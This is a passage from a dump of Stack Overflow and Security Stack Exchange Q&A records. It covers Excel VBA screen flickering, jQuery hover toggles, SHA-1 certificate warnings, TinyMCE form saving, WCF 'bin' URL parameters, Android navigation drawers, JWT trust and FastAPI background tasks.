tabel3.Rows.Count\n For x3 = 1 To xMax3\n Set xTabel3 = tabel3.Range(Cells(x3, 1), Cells(x3, 1))\n textTabel3 = Trim(xTabel3.Text)\n If x3 = 1 Then\n textTabel3 = textTabel3\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel3 = \"& \" & textTabel3\n End If\n r3 = r3 & textTabel3\n Next x3\n\n Dim r4 As Range, tabel4 As Range, xTabel4 As Range\n Dim x4 As Integer, xMax4 As Long\n 'y As Long, yMax As Long\n Dim textTabel4 As String\n Set tabel4 = wsCopy.Range(\"AB10:AB\" & lCopyLastRow)\n Set r4 = wsDest2.Range(\"AB\" & lDestLastRow2)\n\n xMax4 = tabel4.Rows.Count\n For x4 = 1 To xMax4\n Set xTabel4 = tabel4.Range(Cells(x4, 1), Cells(x4, 1))\n textTabel4 = Trim(xTabel4.Text)\n If x4 = 1 Then\n textTabel4 = textTabel4\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel4 = \"& \" & textTabel4\n End If\n r4 = r4 & textTabel4\n Next x4\n\n 'Optional - Select the destination sheet\n wsDest.Activate\n GoTo protect\n\nprotect:\n wsCopy.protect \"pass\", _\n AllowFormattingCells:=True, _\n DrawingObjects:=True, _\n contents:=True, _\n Scenarios:=True\n\n Workbooks(\"Book 2.xls\").Save\n Exit Sub\n\nEnd Sub\n<\/code>\nI using microsoft office 2016, when i running the code is running well but still flickering. It's disturbing and I afraid it will slow process of the code.\nAny idea to stop the flickering when code is running?\nComment: I highly recommend to refactor your code and get all the `GoTo` removed and replaced by other logic. Using `GoTo` is a very bad practice and your code gets hard to maintain. Also using functions\/procedures for similar code (like your loops) would tidy up your code a lot and make it more reliable. For now it looks a bit (actually a lot) messy (sorry I have to say that).\nComment: @Shmukko did you read the title? Or the third line of the code? ;)\nComment: Have you tried Application.ScreenUpdating = False ?\nComment: @Poetoe This question might better fit to: https:\/\/codereview.stackexchange.com\nComment: @P\u1d07\u029c could you help with the code for tidy up my code? I already try to remove go to but still same problem, any idea what cause that problem?\nAnswer: You need to move this code :\n<code>With Application\n .ScreenUpdating = True\n .Calculation = xlCalculationAutomatic\nEnd With\n<\/code>\nto the end, just before <code>End Sub<\/code>\nComment: Actually Nick is right that this code is never run after a `GoTo Export` and therefore should be moved (somewhere else). But this answer is not the solution to the question. The code has a lot more issues than what Nick mentioned.\nComment: Nick is right, if none of the goto catch on, the application-screen is true and does all the export and protect part of the script with screen flickering\nComment: That's not going to solve the problem, plus there is 'Exit Sub' before 'End Sub' in his code so that won't do anything ;)\nComment: @Jo.lass Ah, well you are right! All these `GoTo` got me too confused actually. The OP should really go to https:\/\/codereview.stackexchange.com and get this whole code refactored. \u2022 But the `Exit Sub` in the end should still be removed then.\nAnswer: I could not test it but this should work:\nMy main changes explained:\n\nUnprotect the sheet as late as possible, eg right before export (so we don't need to reprotect it if we actually do not export).\nSame for <code>ScreenUpdating<\/code> and <code>Calculation<\/code> we don't need to deactivate them unless the exports start.\nI used a loop to check the columns <code>CheckColumns = Array(\"S\", \"X\", \"Y\", \"AB\", \"AA\", \"AC\")<\/code>\nI added a procedure <code>ProcessTable<\/code> that handles your multiple loops. Always use procedures to re-use the same code (istead of copying the code).\nI recommend always to activate <code>Option Explicit<\/code>: In the VBA editor go to Tools \u203a Options \u203a Require Variable Declaration.\nYou must always specify in which worksheet a <code>Range<\/code> or <code>Cells<\/code> etc. is otherwise Excel guesses and might be wrong.\n\n<code>Option Explicit\n\nPublic Const SHEET_PASSWORD As String = \"pass\" 'define your password here!\n\nPublic Sub ExportDataImproved()\n Dim wsCopy As Worksheet\n Set wsCopy = Workbooks(\"Book 1.xlsm\").Worksheets(\"Sheet 1\")\n\n Dim wsDest As Worksheet\n Set wsDest = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 1\")\n\n Dim wsDest2 As Worksheet\n Set wsDest2 = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 2\")\n\n Dim CopyLastRow As Long\n CopyLastRow = wsCopy.Range(\"J10:J16\").Find(what:=\"\", LookIn:=xlValues).Offset(-1).Row\n\n Dim DestNextFreeRow As Long\n DestNextFreeRow = wsDest.Cells(wsDest.Rows.Count, \"J\").End(xlUp).Offset(1).Row\n\n Dim Dest2NextFreeRow As Long\n Dest2NextFreeRow = wsDest2.Cells(wsDest2.Rows.Count, \"A\").End(xlUp).Offset(1).Row\n\n 'Perform some checks \u2026\n Dim CheckColumns() As String\n CheckColumns = Array(\"S\", \"X\", \"Y\", \"AB\", \"AA\", \"AC\")\n\n Dim CheckColumn As Variant\n Dim iRow As Long\n For iRow = 10 To 15\n If wsCopy.Cells(iRow, \"W\").Value <> vbNullString Then\n For Each CheckColumn In CheckColumns\n If wsCopy.Cells(iRow, CheckColumn).Value = vbNullString Then\n MsgBox \"Please fill column \" & CheckColumn, vbExclamation\n 'probably Exit Sub here if this should cancel the export\n End If\n Exit For\n Next CheckColumn\n End If\n Next iRow\n\n If wsCopy.Cells(10, \"W\").Value <> vbNullString And wsCopy.Cells(10, \"AD\").Value = vbNullString Then\n MsgBox \"Please fill column \" & CheckColumn, vbExclamation\n 'probably Exit Sub here if this should cancel the export\n End If\n\n If WorksheetFunction.CountIf(wsDest2.Range(\"B10:B\" & Dest2NextFreeRow - 1), wsCopy.Range(\"B10\")) > 0 Then\n If MsgBox(\"Double?\", vbQuestion + vbYesNo, \"Double data\") <> vbYes Then\n Exit Sub\n End If\n ElseIf wsCopy.Range(\"Q5\").Value <> vbNullString Then\n If MsgBox(\"Sure?\", vbQuestion + vbYesNo, \"Manual override\") <> vbYes Then\n Exit Sub\n End If\n End If\n\n 'Export starts now \u2026\n Application.ScreenUpdating = False\n Application.Calculation = xlManual 'sometimes excel calculates values before saving files\n\n wsCopy.Unprotect SHEET_PASSWORD\n On Error GoTo REPROTECT 'In case of an error make sure the sheet is not left unprotected\n\n Dim Cell As Range\n For Each Cell In wsCopy.Range(\"AB10:AB15\")\n Cell.Value = UCase$(Cell.Value)\n Next Cell\n\n wsDest.Rows(DestNextFreeRow & \":\" & DestNextFreeRow + CopyLastRow - 10).Insert shift:=xlShiftDown\n wsDest.Range(\"A\" & DestNextFreeRow) = WorksheetFunction.Max(wsDest.Range(\"A10:A\" & DestNextFreeRow)) + 1\n\n wsDest.Range(\"L\" & DestNextFreeRow - 1).Copy\n wsDest.Range(\"L\" & DestNextFreeRow).Resize(CopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n\n wsDest.Range(\"R\" & DestNextFreeRow - 1).Copy\n wsDest.Range(\"R\" & DestNextFreeRow).Resize(CopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n\n wsCopy.Range(\"B10:K\" & CopyLastRow).Copy\n wsDest.Range(\"B\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"B10:K\" & CopyLastRow).Copy\n wsDest.Range(\"B\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"M10:Q\" & CopyLastRow).Copy\n wsDest.Range(\"M\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"S10:AF\" & CopyLastRow).Copy\n wsDest.Range(\"S\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n For Each Cell In wsDest.Range(\"B\" & DestNextFreeRow & \":B\" & DestNextFreeRow + CopyLastRow - 10)\n Cell.Value = wsCopy.Range(\"B10\").Value\n Next Cell\n\n 'Copy data for wsDest2\n wsDest2.Rows(Dest2NextFreeRow).Insert shift:=xlShiftDown\n wsDest2.Range(\"A\" & Dest2NextFreeRow) = wsDest2.Range(\"A\" & Dest2NextFreeRow - 1).Value + 1\n\n wsCopy.Range(\"B10:C10\").Copy\n wsDest2.Range(\"B\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"E10:Z10\").Copy\n wsDest2.Range(\"E\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"AD10:AF10\").Copy\n wsDest2.Range(\"AD\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n ProcessTable wsCopy.Range(\"D10:D\" & CopyLastRow), wsDest2.Range(\"D\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AC10:AC\" & CopyLastRow), wsDest2.Range(\"AC\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AA10:AA\" & CopyLastRow), wsDest2.Range(\"AA\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AB10:AB\" & CopyLastRow), wsDest2.Range(\"AB\" & Dest2NextFreeRow)\n\n wsDest.Activate\n wsDest.Parent.Save 'save book 2\n\n 'no exit sub here!\nREPROTECT:\n wsCopy.protect SHEET_PASSWORD, _\n AllowFormattingCells:=True, _\n DrawingObjects:=True, _\n contents:=True, _\n Scenarios:=True\n\n Application.ScreenUpdating = True\n Application.Calculation = xlCalculationAutomatic\n\n 'Rise the actual error if one occurs\n If Err.Number <> 0 Then\n Err.Raise Err.Number, Err.Source, Err.Description, Err.HelpFile, Err.HelpContext\n End If\nEnd Sub\n\nPrivate Sub ProcessTable(ByVal TableRange As Range, ByVal ResultRange As Range)\n Dim TextTable As String\n\n Dim iRow As Long\n For iRow = 1 To TableRange.Rows.Count\n TextTable = TextTable & IIf(iRow = 1, vbNullString, \"& \") & Trim$(TableRange.Cells(iRow, 1).Text)\n Next iRow\n\n ResultRange.Value = ResultRange.Value & TextTable\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"Excel ScreenUpdating false and still flickering on Copy Paste to another worksheet","dup_signals":{}},"subset":"stackexchange"} +{"text":"display on hover of div stops working after running script toggle\n\nQuestion: I'm trying to make a div <code>lolcake<\/code> appear in another <code>panel_toggle1<\/code> div either:\n\nwhen mouse hovers over another div <code>panel_toggle1<\/code> \nor toggles on and off each click on the <code>panel_toggle1<\/code> click\n\nhttp:\/\/jsfiddle.net\/Fa7Ct\/ \nhover works fine, but when I click on the <code>panel_toggle1<\/code> and back, the hover stops working. Why is that?\n[EDITED] script (NOTE: some code is removed from this script to make it easier to read - and yes the problem still occurs):\n<code>$(document).ready(function () {\n var toggle_height1 = false;\n $(\"#panel_toggle1\").click(function () {\n\n toggle_height1 = !toggle_height1;\n\n if (toggle_height1 == true) {\n $('.lolcake').css(\"display\", \"block\");\n } else {\n $('.lolcake').css(\"display\", \"none\");\n }\n });\n});\n<\/code>\nworking CSS:\n<code>.lolcake\n{\n display: none;\n}\n\n#panel_toggle1:hover .lolcake\n{\n display: block;\n}\n<\/code>\n(if needed) aspx\n<code><!-- GAME1 PANEL TOGGLE -->\n <div id=\"panel_toggle1\">\n <div class=\"lolcake\" style=\"position:absolute\">text<\/div><img src=\"images\/image.png\" alt=\"\"\/>\n <\/div>\n<\/code>\nI've used other functions like <code>toggle()<\/code> and <code>show()<\/code> <code>hide()<\/code>, but all have the same effect.\nComment: You could include all the elements that appear in your JS into your aspx(html) code, so we could recreate the problem in order to analyze it. Or you could just paste a jsFiddle link.\nComment: exactly, to figure out what is wrong we need all the elements in your code. for example $(\"#panel1\").slideToggle(\"slow\");\n $(\"#container-right\").animate() now where is #panel and #container-right div's??\nComment: I've added a fibble if this helps!\nAnswer: add this to your css\n<code>#panel_toggle1:hover .lolcake\n{\ndisplay: block !important;\n}\n<\/code>\nComment: sorry this doesn't really solve my problem. I'm aiming for a solution that will allow me to toggle via hover **and** clicking (problem is hover over the `panel_toggle1` stops working, button works fine)\nComment: Amazing, exactly what I wanted :)! Thx!!\n","meta":{"source":"stackoverflow","title":"display on hover of div stops working after running script toggle","dup_signals":{}},"subset":"stackexchange"} +{"text":"Browser response to SHA1 signed cert\n\nQuestion: Generated a IIS server certificate using my domain certificate authority (presumed to be an intermediate to the 'secret' root CA) via the Server Certificates -> Create Domain Certificate 'wizard'. Entered the FQDN of my server for the common name, filled out remaining form and hit Finish. Certificate is generated and shows up as a valid cert Issued by MYDOMAIN.FQDN and Issued to MYSERVER.FQDN. I changed the binding for 443 to use this new cert.\nWhen I visit the site using:\nChrome - It doesn't give me the 'untrusted popup' but it does put a red line through the HTTPS part of the URL and when i check the details it says: \"This site uses a weak security config SHA-1 so your connection may not be private\"... I check the details of the certificate and it is indeed the same TLS 1.0 cert i had just enabled and I do see our MYDOMAIN.FQDN as a trusted intermediate certificate in the Chrome -> certificates menu.\nFirefox - It gives me the popup saying \"can't confirm that your connection is secure\"... \"The certificate is not trusted because the issuer certificate is unknown\"... so I look for the MYDOMAIN.FQDN in Firefox's certificate menu and it's nowhere to be seen.\nIE - Lets me right through and I do see MYDOMAIN.FQDN as a trusted intermediate certificate authority.\nQuestions:\n\nWhy doesn't Firefox recognize MYDOMAIN.FQDN as a trusted intermediate certificate... shouldn't this be stored at the OS level (and as a member of the domain apply to all browsers?)\nI fully understand the risk of using SHA1 and the discovered vulnerabilities... is Google just trying to push people out of using SHA1 by putting the (very visible) red line through the URL?\nIs there a setting somewhere in my domain certificate authority that will default to SHA2 or better signature hashs as I didn't see an option for hash algorithm in the \"Create Domain Certificate\" wizard. I'm guessing I could go through the Create Cert Request -> Issuance in two steps and specify the hash algorithm.\n\nThanks!\nAnswer: To answer the first two bullet points:\n\nFirefox has its own list of trusted CAs. You can add certificates in Menu Button>Options>Advanced>Certificates(tab)>View Certificates>Authorities(tab).\nThis is for Firefox version 38.\nYes Google is trying to shame people into moving from SHA1 to a more secure hash such as SHA2. Here is the chromium blog post about it. Also see the note at the bottom about SHA1 in root certs being treated differently than SHA1 in intermediate certs.\n\nedit: I came across some official Microsoft documentation for using SHA-2 on subordinate CAs so I will include it in my answer.\n\nConfiguring Subordinate CAs for SHA-2\nThe hash chosen on the root CA determines how the Subordinate CA's certificate is signed, regardless of the CSP\/KSP and hash is chosen during the subordinate CA's install (and requested in the subordinate CA's certificate request). The requested hash in the certificate request will be ignored and the values in the registry on the parent CA will prevail. \nDuring the Subordinate CA install, the hash algorithm you select under the Select the hash algorithm for signing certificates used by this CA determines how the certificates and CRLs issued by the Subordinate CA are signed. These values can also be changed using the registry keys indicated above and will apply after a restart of ADCS. \nTo summarize, by default, the hash algorithm selected during a root CA's install will determine the hash used to sign the root CA's own certificate and all certificates and CRLs that it issues (although you can change the signing algorithm using the registry changes after the root CA certificate is generated). Subordinate CA's own certificate will be signed by the hash indicated during the root CA's install. The certificates issued by the Subordinate CA will be signed by the hash selected during the Subordinate CA's install. All selected ciphers used for signing issue certificates and CRLs can be changed in the registry, and after restarting ADCS, will apply to all future issued certificates and CRLs. \nIt's also important to note that the certificate template version or the client requesting the certificate has no impact on whether or not the CA signs with a particular hash. The hash used to sign digital certificates is determined by the fields and values listed above. \nComment: I don't have much experience with IIS, but a quick google revealed a tutorial for generating a SHA256 cert. It requires installing openSSL instead of doing everything through IIS. I haven't verified it myself so I'm not including it in my answer. Here is the link: http:\/\/dotnetstock.com\/technical\/how-to-generate-a-sha256-certificate-and-how-to-install-sha256-certificate-in-iis\/\nComment: *\"Google is trying to shame people into moving from SHA1\"* ... still using SHA-1 on their own infrastructure (with a short life span, to avoid their own warning)\n","meta":{"source":"security.stackexchange","title":"Browser response to SHA1 signed cert","dup_signals":{}},"subset":"stackexchange"} +{"text":"TinyMCE isn't allowing MVC Controller to receive updated HTML\/Text when POST through jQuery \"$.post(...)\"\n\nQuestion: I'm not sure I understand what is happening at the moment. I have view with information on it that calls a Modal popup, this contains a <code>TextArea<\/code> with a class of <code>editHtml<\/code>, this class will trigger my TinyMCE editor to initiate.\nModal MyView.cshtml:\n<code>@model x.Models.Content.Elements.ElementHtml\n\n@Html.Partial(\"_Tools\") \/\/This calls the TinyMCE in the next code window\n\n@using (Ajax.BeginForm(\"_Edit\", \"ElementHtmls\", \n new AjaxOptions\n {\n HttpMethod = \"POST\",\n OnSuccess = \"alert('Updated');\",\n OnFailure = \"alert('Failed');\",\n UpdateTargetId = \"ElementUpdated_\" + Model.Oid.ToString()\n },\n new { id = \"ElementForm_\" + Model.Oid.ToString() }\n))\n {\n @Html.AntiForgeryToken()\n\n <div class=\"form-horizontal\">\n <h4>ElementHtml<\/h4>\n <p>This: email@example.com()<\/p>\n <hr \/>\n @Html.ValidationSummary(true, \"\", new { @class = \"text-danger\" })\n @Html.HiddenFor(model => model.Oid)\n @Html.HiddenFor(model => model.Name)\n\n <div class=\"form-group\">\n @*@Html.LabelFor(model => model.Html, htmlAttributes: new { @class = \"control-label col-md-2\" })*@\n <div class=\"col-md-12\">\n\n \/\/This is the editHtml\n \/\/---\n @Html.EditorFor(model => model.Html, new \n { htmlAttributes = new { @class = \"form-control edithtml\" } }\n )\n \/\/---\n\n @Html.ValidationMessageFor(model => model.Html, \"\", new { @class = \"text-danger\" })\n <\/div>\n <\/div>\n\n <div class=\"form-group\">\n <div class=\"col-md-offset-2 col-md-10\">\n <input type=\"submit\" value=\"Save\" class=\"btn btn-default\" \/>\n <\/div>\n <\/div>\n <\/div>\n}\n<\/code>\nJavaScript for TinyMCE:\n<code>@Scripts.Render(\"~\/Scripts\/tinymce\/jquery.tinymce.min.js\")\n@Scripts.Render(\"~\/Scripts\/tinymce\/tinymce.min.js\")\n\n<script type=\"text\/javascript\">\n tinymce.init({\n selector: 'textarea.edithtml',\n branding: false,\n height: 250,\n menubar: false,\n plugins: [\n 'advlist autolink lists link image charmap print preview anchor',\n 'searchreplace visualblocks code fullscreen',\n 'insertdatetime media table contextmenu paste code',\n 'code'\n ],\n toolbar: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image | code',\n content_css: \"\/Content\/bootstrap.css\"\n });\n<\/script>\n<\/code>\nOn Save of the Model, I have the following javascript:\n<code>\/\/...\n$(dialog).dialog({\n title: title,\n \/\/...\n buttons: {\n 'Save': function () {\n var editForm = $(form);\n if (editForm.valid()) {\n\n $.post(editForm.attr('action'), editForm.serialize(), function (data) {\n if (data.Error != undefined && data.Error != '') {\n console.log(\"Data error: \" + data.Error);\n }\n else {\n $(dialog).dialog('close');\n }\n });\n\n }\n },\n\n 'Cancel': function () {\n $(this).dialog('close');\n }\n }\n});\n\n\/\/...\n<\/code>\nIn my code above, I have a Save on the Modal window, this will trigger JQuery's <code>'Save': function () {<\/code>, but also notice that I have a Save button on my cshtml (for testing), this is not what I would like to use, however, note that this Save button does work with the <code>edithtml<\/code> applied. Not sure if this information helps, both submit to the same Controller.\nEverything in the above code sample works properly when <code>edithtml<\/code> is NOT in the @Class, the Controller has the ViewModel, but the property of <code>Html<\/code> is the original value where I want the updated value of course. Other views with <code>edithtml<\/code> (not being in the Modal) work properly with the TinyMCE applied.\nDo I need to tell TinyMCE something during init or customize this section (<code>$.post(editForm.attr('action'), editForm.serialize(), function (data) {<\/code>)?\nAny information or feedback is appreciated.\nAnswer: Turns out that TinyMCE is not directly editing the TextArea, adding <code>tinyMCE.triggerSave();<\/code> before doing anything with the form in JavaScript.\nFirst answer with updated code:\n<code>\/\/...\n$(dialog).dialog({\n title: title,\n \/\/...\n buttons: {\n 'Save': function () {\n tinyMCE.triggerSave(); \/\/ <---- Added this to \"save\" to the TextArea\n var editForm = $(form);\n if (editForm.valid()) {\n\n $.post(editForm.attr('action'), editForm.serialize(), function (data) {\n if (data.Error != undefined && data.Error != '') {\n console.log(\"Data error: \" + data.Error);\n }\n else {\n $(dialog).dialog('close');\n }\n });\n\n }\n },\n\n 'Cancel': function () {\n $(this).dialog('close');\n }\n }\n});\n\n\/\/...\n<\/code>\nSecond answer, much more automatic...\nAfter taking a step further, I was able to avoid changing the above code and adding a <code>blur<\/code> event to the tinyMCE.init:\n<code>tinyMCE.init({\n selector: 'textarea.edithtml',\n branding: false,\n height: 250,\n menubar: false,\n plugins: [\n 'advlist autolink lists link image charmap print preview anchor',\n 'searchreplace visualblocks code fullscreen',\n 'insertdatetime media table contextmenu paste code',\n 'code'\n ],\n toolbar: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image | code',\n content_css: \"\/Content\/bootstrap.css\",\n\n \/\/Added the following (removing the .log once tested properly)\n init_instance_callback: function (editor) {\n editor.on('blur', function (e) {\n console.log('Editor was blurred!');\n tinyMCE.triggerSave();\n });\n }\n\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"TinyMCE isn't allowing MVC Controller to receive updated HTML\/Text when POST through jQuery \"$.post(...)\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to pass \"bin\" as a GET parameter in WCF without receiving 404\n\nQuestion: I have a .NET 4.0 WCF service that accepts GET requests.\nThe URL to access it looks like \nhttps:\/\/api.mysite.com\/MyService.svc\/FunctionName\/Param1\/Param2\/Param3\nWhen Param3 is the word \"bin\" I get a 404\nThis is strange because if the WCF is malformed it shows me a \"Endpoint not found\" error\nI realized it only did this when passing in \"bin\" as any of the params\nHow can I accept this word without it first looking for a physical path and replying with a 404 ?\nComment: This happens passing `bin` as *any* parameter or just the 3rd? If it's the latter than it's more likely an endpoint mapping issue rather than the use of `bin`.\nComment: passing bin as any of the GET params\nComment: Could you post the code?\nComment: No, I can't and its too much to make generic. To fix the issue I determined if bin is one of the params and then added %20 to it like '%20bin' since I know its trimmed on the other side.\nComment: The reason I asked for sample code was because I was interested to know if `bin` was an endpoint issue or something related to what you were doing in the call. For example, does your endpoint get hit and then it returns a 404? Or does it not hit your code at all?\nAnswer: I found an old article for IIS 6.0. Maybe it's still working: StopBinFiltering\nSetting the \n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ASP.NET\\\n\nregistry key can allow a malicious user access to programs and content in the \/bin directory.\nTo disable \/bin filtering:\n\nIn the details pane, right-click, point to New, and click DWORD Value.\nIn the Name box, type the following: StopBinFiltering.\nDouble-click the StopBinFiltering value, and in the Value data box type 1.\nClick OK, and then close Registry Editor.\nTo reenable \/bin filtering, set the StopBinFiltering value to 0.\n\nGood luck\n","meta":{"source":"stackoverflow","title":"How to pass \"bin\" as a GET parameter in WCF without receiving 404","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sliding Menu in android\n\nQuestion: I am using a sliding menu but it is working only for a device with a device higher than 3.0.\nI want to run the same code using defferent versions of android . Can anyone help me to find solution ??\nHere is my code\n<code>public class WelcomeActivity extends Activity {\nprivate DrawerLayout mDrawerLayout;\nprivate ListView mDrawerList;\nprivate ActionBarDrawerToggle mDrawerToggle;\nprivate CharSequence mDrawerTitle;\nprivate CharSequence mTitle;\nprivate String[] navMenuTitles;\nprivate TypedArray navMenuIcons;\nprivate ArrayList<NavDrawerItem> navDrawerItems;\nprivate NavDrawerListAdapter adapter;\n@SuppressLint(\"NewApi\")\n@Override\nprotected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_welcome);\n mTitle = mDrawerTitle = getTitle();\n navMenuTitles = getResources().getStringArray(R.array.nav_drawer_items);\n navMenuIcons = getResources().obtainTypedArray(R.array.nav_drawer_icons);\n mDrawerLayout = (DrawerLayout) findViewById(R.id.drawer_layout);\n mDrawerList = (ListView) findViewById(R.id.list_slidermenu);\n navDrawerItems = new ArrayList<NavDrawerItem>();\n navDrawerItems.add(new NavDrawerItem(navMenuTitles[0],navMenuIcons.getResourceId(0, -1)));\nnavDrawerItems.add(new NavDrawerItem(navMenuTitles[1], navMenuIcons.getResourceId(1, -1)));\nnavDrawerItems.add(new NavDrawerItem(navMenuTitles[2], navMenuIcons.getResourceId(2, -1)));\nnavMenuIcons.recycle();\n mDrawerList.setOnItemClickListener(new SlideMenuClickListener());\n adapter = new NavDrawerListAdapter(getApplicationContext(),navDrawerItems);\n mDrawerList.setAdapter(adapter);\n getActionBar().setDisplayHomeAsUpEnabled(true);\n getActionBar().setHomeButtonEnabled(true);\n mDrawerToggle = new ActionBarDrawerToggle(this, mDrawerLayout,\n R.drawable.ic_drawer, \n R.string.app_name, \n R.string.app_name \n )\n{\npublic void onDrawerClosed(View view) {\ngetActionBar().setTitle(mTitle);\ninvalidateOptionsMenu();\n }\n public void onDrawerOpened(View drawerView) {\n getActionBar().setTitle(mDrawerTitle);\n invalidateOptionsMenu();\n}\n};\nmDrawerLayout.setDrawerListener(mDrawerToggle);\nif (savedInstanceState == null) {\ndisplayView(0);\n }\n}\n\nprivate class SlideMenuClickListener implements\n ListView.OnItemClickListener {\n @Override\n public void onItemClick(AdapterView<?> parent, View view, int position,long id) \n{\ndisplayView(position);}\n}\n\npublic boolean onCreateOptionsMenu(Menu menu) {\n MenuInflater inflater = getMenuInflater();\n inflater.inflate(R.layout.menu, menu);\n menu.getItem(0).getSubMenu();\n return true;\n}\n\nprivate void displayView(int position) {\n\n Fragment fragment = null;\n switch (position) {\n case 0:\n fragment = new HomeFragment();\n break;\n case 1:\n fragment = BackupFragment.getInstance();\n break;\n case 2:\n fragment = new RestoreFragment();\n break;\n default:\n break;\n }\n if (fragment != null) {\n FragmentManager fragmentManager = getFragmentManager();\n fragmentManager.beginTransaction()\n .replace(R.id.frame_container, fragment).commit();\n mDrawerList.setItemChecked(position, true);\n mDrawerList.setSelection(position);\n setTitle(navMenuTitles[position]);\n mDrawerLayout.closeDrawer(mDrawerList);\n } else {\n \/\/erreur de creation de fraglent\n Log.e(\"MainActivity\", \"Error in creating fragment\");\n }\n}\n@Override\npublic void setTitle(CharSequence title) {\n mTitle = title;\n getActionBar().setTitle(mTitle);\n}\n@Override\nprotected void onPostCreate(Bundle savedInstanceState) {\n super.onPostCreate(savedInstanceState);\n mDrawerToggle.syncState();\n}\n@Override\npublic void onConfigurationChanged(Configuration newConfig) {\n super.onConfigurationChanged(newConfig);\n mDrawerToggle.onConfigurationChanged(newConfig);\n}\n<\/code>\n}\nComment: Maybe some functions are only enabled for a certain versions of android, but it is only a guess 'cause you're not providing an example. Please, share some code.\nComment: I edited my post so you can now my code . It is working well in a 3.0 device'version but when I change to a lower version device it craches !!!\nAnswer: Use the MenuDrawer library. Works great!\nComment: Then it should not be a problem, MenuDrawer works in API 7 and up.\nAnswer: Your app crashes because <code>ActionBar<\/code> is not suported below Honeycomb (3.0).\nTo avoid this problem you must use the support library.\nTo have a better explanation:\n<code>The ActionBar APIs were first added in Android 3.0 (API level 11) but they are also available in the Support Library for compatibility with Android 2.1 (API level 7) and above.\n\n**Caution:** Be certain you import the ActionBar class (and related APIs) from the appropriate package:\n<\/code>\n\nIf supporting API levels lower than 11: \n<code>import android.support.v7.app.ActionBar<\/code>\nIf supporting only API level 11 and higher: \n<code>import android.app.ActionBar<\/code>\n\nHope it helps!!\nComment: Yes that it the problem it it added in Android 3.0.\n\nNow when I add \"import android.support.v7.app.ActionBar \"\nI get this error:\nThe import android.support.v7 cannot be resolved\nComment: Fist of all, you must setup the support library (take a look at the link in my answer); and then you must instanciate the `ActionBar` calling `getSupportActionBar()` instead of `getActionBar()`\nComment: Make sure you have set up correctly the support library.\nComment: Have you read the link in my answer? It's everything there step-by- step.\n","meta":{"source":"stackoverflow","title":"Sliding Menu in android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why should I trust a JSON Web Token (JWT)?\n\nQuestion: In the SAML and Kerberos authentication models, there is an explicit understanding of what authority has authenticated the user and issued the credential to be trusted by downstream systems. For purposes of identity propagation, the rights of the downstream system to impersonate the user can be tightly controlled within the solution architecture and the associated identity domains.\nAs far as I can tell, the completeness of the SAML and Kerberos models is not part of the JWT approach. JWT appears to be a mechanism that provides functionality quite similar to Kerberos, but without the supporting functionality of a defined KDE. \nAm I missing something? Is JWT based on a \"web of trust\" or is each JWT implementation responsible for defining its own trustable authentication mechanism and so on?\nAnswer: So, a JWT is just a token. It's not a protocol. As such you really can't compare the SAML protocol to a JWT as that would be like comparing apples to ducks. \nA JWT is just a bunch of identifying information signed by a cryptographic key. What you actually put in it is up to the protocol. There are some formal requirements that distinguish a JWT from a JWS object like issuer and audience information, but that information is still arbitrary. Comparatively SAML tokens and Kerberos tickets do have a bit more structure to them, but that's not to say you can't add the same information to a JWT.\nProtocols on the other hand are a bit trickier to compare.\nThe two protocols people generally think about are OAuth2 and OpenID Connect. Both can and do use JWTs as their token. OAuth2 often uses JWTs as an authorization mechanism -- the presence of the JWT and the claims in the JWT determine what sort of permissions the caller has against a protected resource. It has nothing to do with identifying the user. Conversely a protocol like WS-Federation uses SAML tokens by default to provide identifying information about the user, but can use JWTs as drop in replacements (so long as all parties understand the format) because you can put the same information into the JWT body.\nComment: In this case, maybe I'm comparing a duck to a bill. The duck's bill is an important component, but without a number of other components you don't have a viable beast! That was really the point I was getting at with this question. JWT isn't a solution and building the pieces that would constitute a complete solution is a lot of our-of-scope work for most development efforts. **Thanks for the answer**, you have confirmed my impression, which is what I needed. [Don't let me get started on OAuth2! IMO, it is a poorly written framework, rather than a protocol, but hey, that's just me!]\nComment: @JaimeCastells ah well, analogies lose meaning too easily. You're not wrong -- JWT isn't a solution on its own. BUT as a part of bigger solution they are WAY more useful than (say) SAML tokens because of simplicity and portability.\n","meta":{"source":"security.stackexchange","title":"Why should I trust a JSON Web Token (JWT)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Need to send response status code right away with FastAPI while keeping jobs synchronously in the background\n\nQuestion: I have a very time consuming task (image processing) which receives some input data from a request given to a FastAPI endpoint. In order to keep the caller responsive I need to send an instant response message like \"ok\" along with a 201 status code (the latter optional). \nSo far I've been using this:\n<code>from fastapi import BackgroundTasks, FastAPI\n\napp = FastAPI()\n\ndef main_process(parameters)\n...some long task\n\n@app.post('\/task')\nasync def do_task(reference_id: int,\n bucket: str,\n document_url: str,\n return_url: str,\n background_tasks: BackgroundTasks):\n\n background_tasks.add_task(main_process, bucket, document_url, reference_id, return_url)\n return 